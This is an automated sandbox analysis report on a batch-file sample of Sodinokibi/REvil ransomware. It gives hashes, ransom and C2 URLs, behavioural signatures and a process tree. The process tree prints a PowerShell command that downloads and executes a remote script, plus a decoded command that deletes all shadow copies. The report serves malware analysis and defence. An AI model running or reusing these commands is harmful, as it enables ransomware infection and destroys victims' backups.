Analysis
- max time kernel: 146s
- max time network: 80s
- platform: windows7_x64
- resource: win7v200430
- submitted: 30-04-2020 18:10

Static task: static1

Behavioral task: behavioral1
- Sample: Cjbh0M3S.bat
- Resource: win7v200430

Behavioral task: behavioral2
- Sample: Cjbh0M3S.bat
- Resource: win10v200430
General
- Target: Cjbh0M3S.bat
- Size: 193B
- MD5: 5d7075d9a1018ed0ee80c0e92c3626cb
- SHA1: b3ca818f726d96177859eb15d4871525383594bb
- SHA256: 44fb52f56f3b557e8fd8346ecc5536ca63a3c88eac2ce4549565d9501795c91a
- SHA512: bdd921b5de3eb45836fc4fc1cbb0efdec848a049c3d47d7646ed55927f7ac838480b266d5f361b1d0f99c530dffc4ba45e4962901a30432f1f8c1777bb9ac96c
Malware Config

Extracted
- http://185.103.242.78/pastes/Cjbh0M3S

Extracted
- C:\a21g6-readme.txt
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43AE3FBA7B121249
- http://decryptor.cc/43AE3FBA7B121249
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description                       pid   process         target process
PID 1020 wrote to memory of 1052  1020  cmd.exe         powershell.exe
PID 1052 wrote to memory of 1908  1052  powershell.exe  powershell.exe
PID 1052 wrote to memory of 1908  1052  powershell.exe  powershell.exe
PID 1052 wrote to memory of 1908  1052  powershell.exe  powershell.exe
PID 1052 wrote to memory of 1908  1052  powershell.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description                      pid   process
Token: SeDebugPrivilege          1052  powershell.exe
Token: SeDebugPrivilege          1052  powershell.exe
Token: SeDebugPrivilege          1908  powershell.exe
Token: SeBackupPrivilege         1140  vssvc.exe
Token: SeRestorePrivilege        1140  vssvc.exe
Token: SeAuditPrivilege          1140  vssvc.exe
Token: SeTakeOwnershipPrivilege  1052  powershell.exe
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow  pid   process
3     1052  powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description  process    ioc
Key created  vssvc.exe  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Key created  vssvc.exe  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Key created  vssvc.exe  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Key created  vssvc.exe  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
Makes http(s) request (1 IoC)
Contacts server via http/https, possibly for C2 communication.
description  flow  ioc
HTTP URL     3     http://185.103.242.78/pastes/Cjbh0M3S
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid   process
1052  powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid   process
1052  powershell.exe
1052  powershell.exe
1052  powershell.exe
1908  powershell.exe
1908  powershell.exe
Drops file in Program Files directory (24 IoCs)
Processes: powershell.exe
description                   process         ioc
File opened for modification  powershell.exe  \??\c:\program files\OutNew.mht
File opened for modification  powershell.exe  \??\c:\program files\PopPublish.WTV
File opened for modification  powershell.exe  \??\c:\program files\SetConfirm.mpeg3
File opened for modification  powershell.exe  \??\c:\program files\UnblockRevoke.xltm
File opened for modification  powershell.exe  \??\c:\program files\UndoSuspend.ini
File opened for modification  powershell.exe  \??\c:\program files\UnprotectAssert.eps
File created                  powershell.exe  \??\c:\program files (x86)\a21g6-readme.txt
File created                  powershell.exe  \??\c:\program files\microsoft sql server compact edition\a21g6-readme.txt
File opened for modification  powershell.exe  \??\c:\program files\SubmitBackup.dib
File opened for modification  powershell.exe  \??\c:\program files\EnableSelect.jpe
File opened for modification  powershell.exe  \??\c:\program files\MoveSubmit.mpeg3
File opened for modification  powershell.exe  \??\c:\program files\ConvertToPing.wav
File opened for modification  powershell.exe  \??\c:\program files\ResetRestart.tiff
File opened for modification  powershell.exe  \??\c:\program files\SplitRemove.avi
File opened for modification  powershell.exe  \??\c:\program files\SubmitSuspend.gif
File created                  powershell.exe  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a21g6-readme.txt
File created                  powershell.exe  \??\c:\program files\a21g6-readme.txt
File opened for modification  powershell.exe  \??\c:\program files\AssertInvoke.vdx
File opened for modification  powershell.exe  \??\c:\program files\DismountClose.3gp2
File opened for modification  powershell.exe  \??\c:\program files\ImportResize.3gpp
File opened for modification  powershell.exe  \??\c:\program files\SubmitJoin.docx
File created                  powershell.exe  \??\c:\program files\microsoft sql server compact edition\v3.5\a21g6-readme.txt
File opened for modification  powershell.exe  \??\c:\program files\ApproveResolve.dotx
File opened for modification  powershell.exe  \??\c:\program files\AssertConvert.TS
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description      process         ioc
Set value (str)  powershell.exe  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5e3ef1t9sy.bmp"
Enumerates connected drives 3 TTPs
Processes

- C:\Windows\system32\cmd.exe
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Cjbh0M3S.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1020

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Cjbh0M3S');Invoke-XZCJULAOHR;Start-Sleep -s 10000"
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    PID: 1052

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is the shadow-copy deletion that accounts for the vssvc.exe activity and the "Modifies service" signature below)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      PID: 1908

- C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
  PID: 1140